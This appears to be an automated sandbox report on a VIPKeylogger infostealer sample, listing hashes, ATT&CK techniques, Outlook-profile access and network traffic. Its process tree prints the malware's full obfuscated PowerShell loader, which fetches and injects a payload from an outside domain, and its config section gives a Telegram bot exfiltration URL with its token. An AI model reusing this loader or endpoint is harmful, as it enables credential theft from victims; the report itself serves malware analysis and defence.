vipkeylogger | b1e201db81c599050133b5643a89f950d2b6c2eaf0ed44ea985e742c4a162b31

Analysis

max time kernel
123s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
25/03/2025, 13:25 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PaymentSwiftCopy.js
Size

1.3MB
MD5

410a3c00c23b4af500311ae954d7fae5
SHA1

44b996b2040ddc20f1cf07c7e070514f856b02c9
SHA256

c3aa4900a10fcf72db0cce3754e4cb44617229442f01ed0caf18c159ceea7e57
SHA512

589b6805ca596f85c3cf5ef2365996ae9102ad8460cfd9fc6068df8284e1044002cbf8aa27e327d850f33472f951089d4e8ce43bd5acb0c3a6ff6f31ad9341ce
SSDEEP

192:To1o1o1o1o1o1o1o1o1o1go1o1o1o1o1o1o1o1o1o1go1o1o1o1o1o1o1o1o1o1L:VplQBOr

Score

10^/10

vipkeylogger collection discovery execution keylogger stealer

Malware Config

Extracted

Family

vipkeylogger

https://api.telegram.org/bot8047024230:AAEOgyfPgNxsX6e5QUEWyOZOAYOzCPtuimk/sendMessage?chat_id=769249322

Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger
Vipkeylogger family
vipkeylogger

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	1252	powershell.exe
28	1252	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	wscript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1252	powershell.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
29	checkip.dyndns.org
32	reallyfreegeoip.org
33	reallyfreegeoip.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1252 set thread context of 4804	1252	powershell.exe	95

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1252	powershell.exe
1252	powershell.exe
4804	MSBuild.exe
4804	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1252	powershell.exe
Token: SeDebugPrivilege	4804	MSBuild.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 456 wrote to memory of 1252	456	wscript.exe	85
PID 456 wrote to memory of 1252	456	wscript.exe	85
PID 1252 wrote to memory of 4804	1252	powershell.exe	95
PID 1252 wrote to memory of 4804	1252	powershell.exe	95
PID 1252 wrote to memory of 4804	1252	powershell.exe	95
PID 1252 wrote to memory of 4804	1252	powershell.exe	95
PID 1252 wrote to memory of 4804	1252	powershell.exe	95
PID 1252 wrote to memory of 4804	1252	powershell.exe	95
PID 1252 wrote to memory of 4804	1252	powershell.exe	95
PID 1252 wrote to memory of 4804	1252	powershell.exe	95

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\PaymentSwiftCopy.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:456
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JhypoariaBvhypoariaGIhypoariabwBlhypoariaGwhypoariaaQBrhypoariaGUhypoariaIhypoariahypoaria9hypoariaChypoariahypoariaJwhypoariajhypoariaHghypoariaIwhypoariauhypoariaGUhypoariabhypoariaBphypoariaEYhypoariaZhypoariaBlhypoariaCMhypoariacgBlhypoariaHYhypoariabgBvhypoariaEMhypoariaLwBthypoariaG8hypoariaYwhypoariauhypoariaHMhypoariaIwBuhypoariaGUhypoariabQhypoariajhypoariaGkhypoariadQByhypoariaGMhypoariaZQByhypoariaCMhypoariabgBlhypoariaGwhypoariaYQhypoariajhypoariaC8hypoariaLwhypoaria6hypoariaHMhypoariachypoariahypoariajhypoariaCMhypoariaahypoariahypoarianhypoariaDshypoariaJhypoariaBihypoariaGUhypoariabgBkhypoariaHMhypoariabwBthypoariaGUhypoariaIhypoariahypoaria9hypoariaChypoariahypoariaJhypoariaBvhypoariaGIhypoariabwBlhypoariaGwhypoariaaQBrhypoariaGUhypoariaIhypoariahypoariathypoariaHIhypoariaZQBwhypoariaGwhypoariaYQBjhypoariaGUhypoariaIhypoariahypoarianhypoariaCMhypoariaJwhypoariashypoariaChypoariahypoariaJwB0hypoariaCchypoariaOwhypoariakhypoariaG0hypoariaYQBshypoariaGwhypoariabwBwhypoariaGwhypoariaYQBjhypoariaGUhypoariabgB0hypoariaGEhypoariaIhypoariahypoaria9hypoariaChypoariahypoariaJwBohypoariaHQhypoariadhypoariaBwhypoariaHMhypoariaOghypoariavhypoariaC8hypoariadhypoariaBhhypoariaGwhypoariaZQBuhypoariaHQhypoariacgBlhypoariaGMhypoariacgB1hypoariaGkhypoariadhypoariaBthypoariaGUhypoariabgB0hypoariaHMhypoariaLgBjhypoariaG8hypoariabQhypoariavhypoariaG4hypoariaZQB3hypoariaF8hypoariaaQBthypoariaGEhypoariaZwBlhypoariaC4hypoariaagBwhypoariaGchypoariaJwhypoaria7hypoariaCQhypoariadhypoariaB1hypoariaGchypoariadhypoariaB1hypoariaHhypoariahypoariaaQB0hypoariaGUhypoariaIhypoariahypoaria9hypoariaChypoariahypoariaTgBlhypoariaHchypoariaLQBPhypoariaGIhypoariaagBlhypoariaGMhypoariadhypoariahypoariaghypoariaFMhypoariaeQBzhypoariaHQhypoariaZQBthypoariaC4hypoariaTgBlhypoariaHQhypoariaLgBXhypoariaGUhypoariaYgBDhypoariaGwhypoariaaQBlhypoariaG4hypoariadhypoariahypoaria7hypoariaCQhypoariadwBphypoariaG4hypoariaZhypoariaBthypoariaGkhypoariabhypoariaBshypoariaGUhypoariaZhypoariahypoariaghypoariaD0hypoariaIhypoariahypoariakhypoariaHQhypoariadQBnhypoariaHQhypoariadQBwhypoariaGkhypoariadhypoariaBlhypoariaC4hypoariaRhypoariaBvhypoariaHchypoariabgBshypoariaG8hypoariaYQBkhypoariaEQhypoariaYQB0hypoariaGEhypoariaKhypoariahypoariakhypoariaG0hypoariaYQBshypoariaGwhypoariabwBwhypoariaGwhypoariaYQBjhypoariaGUhypoariabgB0hypoariaGEhypoariaKQhypoaria7hypoariaCQhypoariaZhypoariaB1hypoariaGMhypoariaawBphypoariaG4hypoariaZwhypoariaghypoariaD0hypoariaIhypoariaBbhypoariaFMhypoariaeQBzhypoariaHQhypoariaZQBthypoariaC4hypoariaVhypoariaBlhypoariaHghypoariadhypoariahypoariauhypoariaEUhypoariabgBjhypoariaG8hypoariaZhypoariaBphypoariaG4hypoariaZwBdhypoariaDohypoariaOgBVhypoariaFQhypoariaRghypoaria4hypoariaC4hypoariaRwBlhypoariaHQhypoariaUwB0hypoariaHIhypoariaaQBuhypoariaGchypoariaKhypoariahypoariakhypoariaHchypoariaaQBuhypoariaGQhypoariabQBphypoariaGwhypoariabhypoariaBlhypoariaGQhypoariaKQhypoaria7hypoariaCQhypoariaYwBvhypoariaG8hypoariabhypoariaBphypoariaG0hypoariaYQBuhypoariaChypoariahypoariaPQhypoariaghypoariaCchypoariaPhypoariahypoaria8hypoariaEIhypoariaQQBThypoariaEUhypoariaNghypoaria0hypoariaF8hypoariaUwBUhypoariaEEhypoariaUgBUhypoariaD4hypoariaPghypoarianhypoariaDshypoariaJhypoariaBhhypoariaHYhypoariaYQB1hypoariaG4hypoariadhypoariaBvhypoariaHUhypoariacghypoariaghypoariaD0hypoariaIhypoariahypoarianhypoariaDwhypoariaPhypoariaBChypoariaEEhypoariaUwBFhypoariaDYhypoariaNhypoariaBfhypoariaEUhypoariaTgBEhypoariaD4hypoariaPghypoarianhypoariaDshypoariaJhypoariaBnhypoariaGUhypoariabgB0hypoariaHMhypoariaIhypoariahypoaria9hypoariaChypoariahypoariaJhypoariaBkhypoariaHUhypoariaYwBrhypoariaGkhypoariabgBnhypoariaC4hypoariaSQBuhypoariaGQhypoariaZQB4hypoariaE8hypoariaZghypoariaohypoariaCQhypoariaYwBvhypoariaG8hypoariabhypoariaBphypoariaG0hypoariaYQBuhypoariaCkhypoariaOwhypoariakhypoariaGQhypoariaYQBzhypoariaGUhypoariadwBlhypoariaChypoariahypoariaPQhypoariaghypoariaCQhypoariaZhypoariaB1hypoariaGMhypoariaawBphypoariaG4hypoariaZwhypoariauhypoariaEkhypoariabgBkhypoariaGUhypoariaehypoariaBPhypoariaGYhypoariaKhypoariahypoariakhypoariaGEhypoariadgBhhypoariaHUhypoariabgB0hypoariaG8hypoariadQByhypoariaCkhypoariaOwhypoariakhypoariaGchypoariaZQBuhypoariaHQhypoariacwhypoariaghypoariaC0hypoariaZwBlhypoariaChypoariahypoariaMhypoariahypoariaghypoariaC0hypoariaYQBuhypoariaGQhypoariaIhypoariahypoariakhypoariaGQhypoariaYQBzhypoariaGUhypoariadwBlhypoariaChypoariahypoariaLQBnhypoariaHQhypoariaIhypoariahypoariakhypoariaGchypoariaZQBuhypoariaHQhypoariacwhypoaria7hypoariaCQhypoariaZwBlhypoariaG4hypoariadhypoariaBzhypoariaChypoariahypoariaKwhypoaria9hypoariaChypoariahypoariaJhypoariaBjhypoariaG8hypoariabwBshypoariaGkhypoariabQBhhypoariaG4hypoariaLgBMhypoariaGUhypoariabgBnhypoariaHQhypoariaahypoariahypoaria7hypoariaCQhypoariaQQBthypoariaGIhypoariaaQBlhypoariaG4hypoariaIhypoariahypoaria9hypoariaChypoariahypoariaJhypoariaBkhypoariaGEhypoariacwBlhypoariaHchypoariaZQhypoariaghypoariaC0hypoariaIhypoariahypoariakhypoariaGchypoariaZQBuhypoariaHQhypoariacwhypoaria7hypoariaCQhypoariabwBwhypoariaG8hypoariadhypoariaBohypoariaGUhypoariacgBhhypoariaHhypoariahypoariaeQhypoariaghypoariaD0hypoariaIhypoariahypoariakhypoariaGQhypoariadQBjhypoariaGshypoariaaQBuhypoariaGchypoariaLgBThypoariaHUhypoariaYgBzhypoariaHQhypoariacgBphypoariaG4hypoariaZwhypoariaohypoariaCQhypoariaZwBlhypoariaG4hypoariadhypoariaBzhypoariaCwhypoariaIhypoariahypoariakhypoariaEEhypoariabQBihypoariaGkhypoariaZQBuhypoariaCkhypoariaOwhypoariakhypoariaHhypoariahypoariaZQB0hypoariaHIhypoariabwBshypoariaGkhypoariaYwhypoariaghypoariaD0hypoariaIhypoariaBbhypoariaFMhypoariaeQBzhypoariaHQhypoariaZQBthypoariaC4hypoariaQwBvhypoariaG4hypoariadgBlhypoariaHIhypoariadhypoariaBdhypoariaDohypoariaOgBGhypoariaHIhypoariabwBthypoariaEIhypoariaYQBzhypoariaGUhypoariaNghypoaria0hypoariaFMhypoariadhypoariaByhypoariaGkhypoariabgBnhypoariaCghypoariaJhypoariaBvhypoariaHhypoariahypoariabwB0hypoariaGghypoariaZQByhypoariaGEhypoariachypoariaB5hypoariaCkhypoariaOwhypoariakhypoariaGYhypoariaZQByhypoariaHIhypoariabwBhhypoariaG4hypoariaIhypoariahypoaria9hypoariaChypoariahypoariaWwBThypoariaHkhypoariacwB0hypoariaGUhypoariabQhypoariauhypoariaFIhypoariaZQBmhypoariaGwhypoariaZQBjhypoariaHQhypoariaaQBvhypoariaG4hypoariaLgBBhypoariaHMhypoariacwBlhypoariaG0hypoariaYgBshypoariaHkhypoariaXQhypoaria6hypoariaDohypoariaThypoariaBvhypoariaGEhypoariaZhypoariahypoariaohypoariaCQhypoariachypoariaBlhypoariaHQhypoariacgBvhypoariaGwhypoariaaQBjhypoariaCkhypoariaOwhypoariakhypoariaHUhypoariabgBlhypoariaG4hypoariadgBphypoariaGUhypoariaZhypoariahypoariaghypoariaD0hypoariaIhypoariaBbhypoariaGQhypoariabgBshypoariaGkhypoariaYghypoariauhypoariaEkhypoariaTwhypoariauhypoariaEghypoariabwBthypoariaGUhypoariaXQhypoariauhypoariaEchypoariaZQB0hypoariaE0hypoariaZQB0hypoariaGghypoariabwBkhypoariaCghypoariaJwBWhypoariaEEhypoariaSQhypoarianhypoariaCkhypoariaLgBJhypoariaG4hypoariadgBvhypoariaGshypoariaZQhypoariaohypoariaCQhypoariabgB1hypoariaGwhypoariabhypoariahypoariashypoariaChypoariahypoariaWwBvhypoariaGIhypoariaagBlhypoariaGMhypoariadhypoariaBbhypoariaF0hypoariaXQhypoariaghypoariaEhypoariahypoariaKhypoariahypoariakhypoariaGIhypoariaZQBuhypoariaGQhypoariacwBvhypoariaG0hypoariaZQhypoariashypoariaCchypoariaJwhypoariashypoariaCchypoariaJwhypoariashypoariaCchypoariaJwhypoariashypoariaCchypoariaTQBThypoariaEIhypoariadQBphypoariaGwhypoariaZhypoariahypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoariayhypoariaCchypoariaKQhypoariaphypoariahypoaria=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('hypoaria','A'))); Invoke-Expression $OWjuxd""
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1252
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Accesses Microsoft Outlook profiles
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:4804

Network

DNS

talentrecruitments.com

powershell.exe

Remote address:

8.8.8.8:53

Request

talentrecruitments.com

IN A

Response

talentrecruitments.com

IN A

67.23.254.14
GET

https://talentrecruitments.com/new_image.jpg

powershell.exe

Remote address:

67.23.254.14:443

Request

GET /new_image.jpg HTTP/1.1
Host: talentrecruitments.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:23 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 25 Mar 2025 09:45:56 GMT
Accept-Ranges: bytes
Content-Length: 3268007
Keep-Alive: timeout=5, max=100
Content-Type: image/jpeg
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.ax-0001.ax-msedge.net

g-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.27.10

ax-0001.ax-msedge.net

IN A

150.171.28.10
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7e0a7088193e448a886fb915093e576d&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7e0a7088193e448a886fb915093e576d&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=2EFF7AFD17A161121B786F4716866091; domain=.bing.com; expires=Sun, 19-Apr-2026 13:25:24 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8800259ECEB84879BF8A9A347957DB5F Ref B: LON04EDGE0713 Ref C: 2025-03-25T13:25:24Z
date: Tue, 25 Mar 2025 13:25:24 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7e0a7088193e448a886fb915093e576d&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=7e0a7088193e448a886fb915093e576d&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=2EFF7AFD17A161121B786F4716866091

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=8kquZfoXvHN1kCBidyPF6cXoOlYP5h2y0FiwJMNEgBw; domain=.bing.com; expires=Sun, 19-Apr-2026 13:25:24 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6AE92B8A234146FBB6DFD64D5D7EDD8A Ref B: LON04EDGE0713 Ref C: 2025-03-25T13:25:24Z
date: Tue, 25 Mar 2025 13:25:24 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7e0a7088193e448a886fb915093e576d&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=7e0a7088193e448a886fb915093e576d&localId=w:403FACAB-733C-BF36-6CC4-779B6FC22DC3&deviceId=6825849396577622&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=2EFF7AFD17A161121B786F4716866091; MSPTC=8kquZfoXvHN1kCBidyPF6cXoOlYP5h2y0FiwJMNEgBw

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 3B5AA0CA2C5C4F07ADFB72113F00E4DE Ref B: LON04EDGE0713 Ref C: 2025-03-25T13:25:24Z
date: Tue, 25 Mar 2025 13:25:24 GMT
GET

https://talentrecruitments.com/ConvertedFile.txt

powershell.exe

Remote address:

67.23.254.14:443

Request

GET /ConvertedFile.txt HTTP/1.1
Host: talentrecruitments.com

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:30 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade
Last-Modified: Tue, 25 Mar 2025 12:08:16 GMT
Accept-Ranges: bytes
Content-Length: 370688
Content-Type: text/plain
DNS

checkip.dyndns.org

MSBuild.exe

Remote address:

8.8.8.8:53

Request

checkip.dyndns.org

IN A

Response

checkip.dyndns.org

IN CNAME

checkip.dyndns.com

checkip.dyndns.com

IN A

193.122.130.0

checkip.dyndns.com

IN A

132.226.247.73

checkip.dyndns.com

IN A

158.101.44.242

checkip.dyndns.com

IN A

132.226.8.169

checkip.dyndns.com

IN A

193.122.6.168
GET

http://checkip.dyndns.org/

MSBuild.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:37 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 8f787dec04c73cbf1ba4031da935dd80
GET

http://checkip.dyndns.org/

MSBuild.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:38 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b2efadf0cf4130915c8ab245a8db965a
GET

http://checkip.dyndns.org/

MSBuild.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:39 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 01de0717c78b087494bd26ca489b9c89
GET

http://checkip.dyndns.org/

MSBuild.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:39 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 37fe192fdc09da6bdbde4b0e4380ba3d
GET

http://checkip.dyndns.org/

MSBuild.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:40 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 7bffbb73574b05551784986f36040dc8
GET

http://checkip.dyndns.org/

MSBuild.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:42 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b7562e69435ad83b7d36940722e10e3f
GET

http://checkip.dyndns.org/

MSBuild.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:43 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 08c33b3871c4c4c4241e3ad33c417fc9
GET

http://checkip.dyndns.org/

MSBuild.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:43 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 611524e315bd45f9b29a7339dddef368
GET

http://checkip.dyndns.org/

MSBuild.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:44 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 5f458c91471f63e1ed0d505f415ac7dc
GET

http://checkip.dyndns.org/

MSBuild.exe

Remote address:

193.122.130.0:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:45 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: c1bcd3914c1966c9f496219466eebbec
DNS

reallyfreegeoip.org

MSBuild.exe

Remote address:

8.8.8.8:53

Request

reallyfreegeoip.org

IN A

Response

reallyfreegeoip.org

IN A

104.21.16.1

reallyfreegeoip.org

IN A

104.21.80.1

reallyfreegeoip.org

IN A

104.21.112.1

reallyfreegeoip.org

IN A

104.21.32.1

reallyfreegeoip.org

IN A

104.21.64.1

reallyfreegeoip.org

IN A

104.21.48.1

reallyfreegeoip.org

IN A

104.21.96.1
GET

https://reallyfreegeoip.org/xml/212.102.63.147

MSBuild.exe

Remote address:

104.21.16.1:443

Request

GET /xml/212.102.63.147 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:39 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 466812
Last-Modified: Thu, 20 Mar 2025 03:45:27 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7OOog82smTdRMTSv81JmTYO59A70ZhOt67DhxJrR7ms8xnCHnAERRy7fWfsD30RnM7auMqCknWVGo6WzJInFpQ6kUSfJ99RJo2BmlG2HQcITq4iXY3965LZb0DxPjJ0nDI1%2BV8hW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 925ebc473a02edee-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=52318&min_rtt=49856&rtt_var=16037&sent=6&recv=7&lost=0&retrans=1&sent_bytes=3268&recv_bytes=390&delivery_rate=80778&cwnd=254&unsent_bytes=0&cid=d12a42917be55283&ts=410&x=0"
GET

https://reallyfreegeoip.org/xml/212.102.63.147

MSBuild.exe

Remote address:

104.21.16.1:443

Request

GET /xml/212.102.63.147 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 25 Mar 2025 13:25:39 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 466812
